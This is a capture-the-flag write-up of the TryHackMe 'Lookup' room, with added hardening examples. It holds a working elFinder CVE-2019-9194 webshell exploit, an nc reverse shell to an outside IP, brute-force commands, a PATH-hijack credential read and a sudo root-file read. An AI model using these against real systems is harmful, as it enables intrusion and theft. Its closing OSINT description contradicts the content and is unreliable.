THM Lookup - Linux (Easy)
A Linux machine that teaches us how to exploit web application vulnerabilities, such as command injection, and how to understand secure coding practices. Covers: Linux, Decoding, and HTTPS Attacks.
Enumeration and Network scanning
┌──(kali㉿kali)-[~]
└─$ cat nmap-result.log
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
| 256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_ 256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Hidden Directory and Sub-domain Scanning
┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.lookup.thm" -u http://lookup.thm -fs 0
www [Status: 200, Size: 719, Words: 114, Lines: 27, Duration: 3901ms]
Great, we found a sub-domain.
lookup.thm www.lookup.thm
Login Attacks
However, it still redirects us to the same page. Luckily, many users and admins use weak passwords, so we can brute-force them with FFUF (the same kit we use for dir-busting).
With the username admin I saw a change in the error message, which confirmed that the account exists.
General form: ffuf -w /wordlists -X POST -u http:// -d 'user&pass' -H "Content-Type" -fw 10
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -u http://lookup.thm/login.php -d 'username=FUZZ&password=pass' -H "Content-Type: application/x-www-form-urlencoded" -fw 10
admin [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 242ms]
jose [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 242ms]
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/rockyou.txt -X POST -u http://lookup.thm/login.php -d 'username=jose&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded" -fw 8
password123 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 239ms]
Welp, we got Jose's credentials:
Username: jose / Password: password123
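As an added illustration (not code from the write-up or the room), here is the kind of login handler that produces the username-enumeration oracle used above, beside one that does not: the leaky version returns a different failure message when the username is unknown, which is exactly what ffuf's word-count filter separates; the uniform version returns one message and does the same hashing work for unknown users. Usernames, salt and messages are constructed.

```python
import hashlib
import hmac

# Constructed demo store: username -> (salt, PBKDF2 digest). Salt and passwords
# are made up, except jose/password123 which the write-up recovered.
def _hash(salt, password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

_SALT = b"constructed-salt"
USERS = {
    "admin": (_SALT, _hash(_SALT, "not-the-real-admin-password")),
    "jose": (_SALT, _hash(_SALT, "password123")),
}
# Dummy record used for unknown usernames so the failing path costs the same.
_DUMMY = (_SALT, _hash(_SALT, "dummy-password"))


def login_leaky(username, password):
    """Vulnerable: a different failure message when the username is unknown.
    ffuf's -fw (word count) filter separates the two and lists valid accounts."""
    if username not in USERS:
        return "Wrong username or password. Please try again."
    salt, digest = USERS[username]
    if _hash(salt, password) != digest:
        return "Wrong password. Please try again."
    return "OK"


def login_uniform(username, password):
    """Hardened: one message body and the same hashing work for every failure,
    so neither the response nor its timing says whether the user exists."""
    salt, digest = USERS.get(username, _DUMMY)
    match = hmac.compare_digest(_hash(salt, password), digest)
    return "OK" if match and username in USERS else "Invalid credentials."


def word_count(message):
    """The property ffuf filtered on in the write-up (-fw 10 / -fw 8)."""
    return len(message.split())
```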
And another sub-domain was found: files.lookup.thm
elFinder 2.1.47
Kinda crazy for a backend huh?
I was expecting this to be listed in VulnDB or Exploit-DB, sooo… if you look it up, a vulnerability for this version is found:
CVE-2019-9194 | https://www.exploit-db.com/exploits/46481
It looks like a command injection from an input (in this case an image upload), combined with a file upload attack. Following the CVE, I re-created my own exploit (shell case):
#!/usr/bin/env python3
"""
Exploit Title: elFinder <= 2.1.47 - Command Injection.
CVE: CVE-2019-9194
Usage: python3 exploit.py [URL]
"""
import sys
import json
import requests

PAYLOAD = (
    'SecSignal.jpg;echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | '
    'xxd -r -p > SecSignal.php;echo SecSignal.jpg'
)


def usage():
    print(f"Usage: python3 {sys.argv[0]} [URL]")
    sys.exit(1)


def upload(url, payload):
    """Upload the malicious image file and return its hash."""
    try:
        with open('SecSignal.jpg', 'rb') as imgfile:
            files = {'upload[]': (payload, imgfile)}
            data = {
                "reqid": "1693222c439f4",
                "cmd": "upload",
                "target": "l1_Lw",
                "mtime[]": "1497726174"
            }
            response = requests.post(f"{url}/php/connector.minimal.php", files=files, data=data)
        response.raise_for_status()
        resp_json = response.json()
        return resp_json['added'][0]['hash']
    except Exception as e:
        print(f"[!] Upload failed: {e}")
        sys.exit(1)


def img_rotate(url, file_hash):
    """Trigger the image rotate (resize) to execute the payload."""
    params = {
        "target": file_hash,
        "width": "539",
        "height": "960",
        "degree": "180",
        "quality": "100",
        "bg": "",
        "mode": "rotate",
        "cmd": "resize",
        "reqid": "169323550af10c"
    }
    response = requests.get(f"{url}/php/connector.minimal.php", params=params)
    return response.text


def shell(url):
    """Interactive shell to execute commands via the uploaded webshell."""
    shell_url = f"{url}/php/SecSignal.php"
    try:
        r = requests.get(shell_url)
        if r.status_code == 200:
            print("[+] Pwned! :)")
            print("[+] Getting the shell...")
            while True:
                try:
                    cmd = input("$ ")
                    if cmd.strip() == "":
                        continue
                    r = requests.get(f"{shell_url}?c={cmd}")
                    print(r.text)
                except KeyboardInterrupt:
                    print("\nBye kaker!")
                    sys.exit(0)
        else:
            print("[*] The site seems not to be vulnerable :(")
    except Exception as e:
        print(f"[!] Shell request failed: {e}")


def main():
    if len(sys.argv) != 2:
        usage()
    url = sys.argv[1].rstrip("/")
    print("[*] Uploading the malicious image...")
    file_hash = upload(url, PAYLOAD)
    print("[*] Running the payload...")
    img_rotate(url, file_hash)
    shell(url)


if __name__ == "__main__":
    main()
CVE-2019-9194 is a critical command injection vulnerability affecting elFinder versions up to 2.1.47, specifically in its PHP connector component. This vulnerability allows an attacker to gain remote code execution by exploiting the way file uploads and image processing commands are handled. The provided Python exploit script demonstrates this by first uploading a specially crafted image file containing a payload that writes a PHP web shell to the server.
It then triggers the payload via the vulnerable image manipulation endpoint, effectively planting the shell. Finally, the script provides an interactive command-line interface, allowing the attacker to execute arbitrary commands on the compromised web server through the uploaded web shell, highlighting the seriousness of the vulnerability for any unpatched elFinder deployments.
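Added example, not elFinder's code or the author's: the class of fix for the connector bug described above, in Python. A user-controlled upload name is checked against an allowlist and handed to the image tool as a single argv element, never spliced into a shell string. The payload string has the shape of the one in the exploit with the hex shortened, and `rotate-image` is a hypothetical tool name standing in for whatever image processor the connector calls.

```python
import os
import re
import subprocess

# Constructed: the shape of the CVE-2019-9194 upload name from the exploit above,
# with the hex shortened. Everything after the first ';' is the injected command.
INJECTED_NAME = "SecSignal.jpg;echo 3c3f7068 | xxd -r -p > SecSignal.php;echo SecSignal.jpg"
CLEAN_NAME = "SecSignal.jpg"

SHELL_META = set(";|&$><`\\!'\"\n\t *?()[]{}~")
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def shell_metachars(name):
    """Detection helper: which shell metacharacters a submitted name contains.
    Useful for logging/alerting on upload requests, not as the only defence."""
    return sorted(ch for ch in SHELL_META if ch in name)


def is_safe_upload_name(name):
    """Allowlist: one path component, safe characters, image extension only."""
    if not SAFE_NAME.match(name):
        return False
    return os.path.splitext(name)[1].lower() in ALLOWED_EXT


def build_rotate_cmd_unsafe(name, degree):
    """Vulnerable pattern: the name is spliced into a command string that a
    shell will parse, so ';' and '|' in INJECTED_NAME become extra commands."""
    return f"rotate-image -d {degree} {name}"  # 'rotate-image' is a hypothetical tool


def build_rotate_argv(name, degree):
    """Hardened: validate, then build an argv list for subprocess.run(shell=False);
    the name is one opaque argument whatever characters it contains."""
    if not is_safe_upload_name(name):
        raise ValueError(f"rejected upload name, metachars: {shell_metachars(name)}")
    return ["rotate-image", "-d", str(int(degree)), name]  # hypothetical tool


def echo_argv_literal(name):
    """Show that an argv element is never shell-parsed: printf receives the whole
    injected string as one argument and simply prints it back unchanged."""
    out = subprocess.run(["printf", "%s", name], capture_output=True, text=True, check=True)
    return out.stdout
```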
CVE and Shell Uploading
┌──(kali㉿kali)-[~]
└─$ cve.py testupload.jpg
(binary JPEG data: JFIF/Exif header followed by an embedded XMP metadata block; output truncated)
When the Python script is executed, I got a shell back as www-data.
┌──(kali㉿kali)-[~]
└─$ python2.7 cve.py http://files.lookup.thm/elFinder/
[*] Uploading the malicious image...
[*] Running the payload...
[+] Pwned!
[+] Getting the shell...
$ whoami
www-data
Set up the reverse shell with nc and then set up a TTY.
┌──(kali㉿kali)-[~]
└─$ rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.6.55.144%201234%20%3E%2Ftmp%2Ff
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
┌──(kali㉿kali)-[~]
└─$ python3 -c 'import pty; pty.spawn("bash")'
Target Shell
$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jun 2 2023 .
drwxr-xr-x 19 root root 4096 Jan 11 2024 ..
drwxr-xr-x 5 think think 4096 Jan 11 2024 think
Credential Harvesting
When you search for SUID binaries, take a look at /usr/sbin/pwm:
$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pwm
When executed, it runs the id command and then tries to read /home/<username>/.passwords:
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found
Or expand your search:
$ ls -la /home/think
total 40
drwxr-xr-x 5 think think 4096 Jan 11 2024 .
drwxr-xr-x 3 root root 4096 Jun 2 2023 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think 220 Jun 2 2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun 2 2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21 2023 .cache
drwx------ 3 think think 4096 Aug 9 2023 .gnupg
-rw-r----- 1 root think 525 Jul 30 2023 .passwords
-rwxr-xr-x 1 think think 807 Jun 2 2023 .profile
drw-r----- 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Jun 21 2023 .viminfo -> /dev/null
-rw-r----- 1 root think 33 Jul 30 2023 user.txt
Hmmmm… Bring /usr/sbin/pwm back locally and decompile it with Ghidra: it turns out the id command is invoked with a relative path.
It also extracts the username from the output of id and uses it to build the path /home/<username>/.passwords, which means we can manipulate it.
We can replace the id command with a fake one that makes the process read /home/think/.passwords, and get it picked up through PATH:
$ echo '#!/bin/bash' > id
$ echo 'echo "uid=1000(think) gid=1000(think) groups=1000(think)"' >> id
$ chmod +x id
$ export PATH=/tmp:$PATH
Run /usr/sbin/pwm again, and /home/think/.passwords is read:
$ /usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
jose1001teles
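Added example (not the pwm binary's code): pwm's two mistakes, a relative `id` lookup through PATH and trusting `id`'s output for the username, beside the hardened alternative of asking the kernel and the passwd database directly. Written in Python for illustration; the C equivalent is getuid() plus getpwuid() in place of running `id` through a shell, and `SPOOFED_ID` is the output of the fake `id` from the write-up.

```python
import os
import pwd
import re
import stat

# Constructed: what the fake ./id planted in /tmp printed in the write-up.
SPOOFED_ID = "uid=1000(think) gid=1000(think) groups=1000(think)"


def resolve_command(cmd, path_env, exists=os.path.isfile):
    """What a relative exec of `cmd` does: the first PATH entry holding it wins.
    After `export PATH=/tmp:$PATH`, /tmp/id shadows /usr/bin/id for a setuid
    binary that neither resets PATH nor uses an absolute path."""
    for d in path_env.split(":"):
        candidate = os.path.join(d or ".", cmd)
        if exists(candidate):
            return candidate
    return None


def username_from_id_output(text):
    """pwm's approach: trust the uid=N(name) field of whatever `id` printed.
    Whoever controls the `id` that ran controls the name, hence the path."""
    m = re.match(r"uid=\d+\(([^)]+)\)", text)
    if not m:
        raise ValueError("unexpected id output")
    return m.group(1)


def username_from_kernel(uid=None):
    """Hardened: real uid from the kernel, name from the passwd database.
    No child process, so PATH and a planted `id` cannot influence it."""
    uid = os.getuid() if uid is None else uid
    return pwd.getpwuid(uid).pw_name


def passwords_path(uid=None):
    """Derive the file from the passwd home directory, not '/home/' + parsed name."""
    uid = os.getuid() if uid is None else uid
    return os.path.join(pwd.getpwuid(uid).pw_dir, ".passwords")


def read_passwords_nofollow(path):
    """A privileged reader opens with O_NOFOLLOW and insists on a regular file,
    so a symlink dropped in the user's home cannot redirect it to another file."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    if not stat.S_ISREG(os.fstat(fd).st_mode):
        os.close(fd)
        raise PermissionError(f"{path} is not a regular file")
    with os.fdopen(fd) as f:
        return f.read()
```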
Credential Brute-forcing
Save the password list we got for think to a file (think_pass) and brute-force it; one of them should be a password we can use for SSH login and privilege escalation.
┌──(kali㉿kali)-[~]
└─$ hydra -f -l think -P think_pass lookup.thm ssh
[22][ssh] host: lookup.thm login: think password: josemario.AKA(think)
Successful SSH connection as user think.
┌──(kali㉿kali)-[~]
└─$ ssh think@lookup.thm
think@lookup:~$
Privilege escalation
$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on lookup:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on lookup:
(ALL) /usr/bin/look
File read
It reads data from files; it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read look '' "$LFILE"
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
sudo install -m =xs $(which look) .
LFILE=file_to_read ./look '' "$LFILE"
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
LFILE=file_to_read sudo look '' "$LFILE"
$ LFILE=/root/root.txt
$ sudo /usr/bin/look '' "$LFILE"
5a285a9fxxxxx
Welp, amazing box from THM. I gotta say: the "Look Up" room on TryHackMe is a great choice for learners because it provides a practical, hands-on introduction to Open Source Intelligence (OSINT) techniques.
This room guides users through real-world scenarios where they gather publicly available information to solve challenges, such as tracking down usernames, emails, websites, and social media profiles. It’s beginner-friendly, requiring no prior experience, but still manages to teach critical skills valuable for penetration testing, cyber investigations, and digital forensics.
Happy Hacking!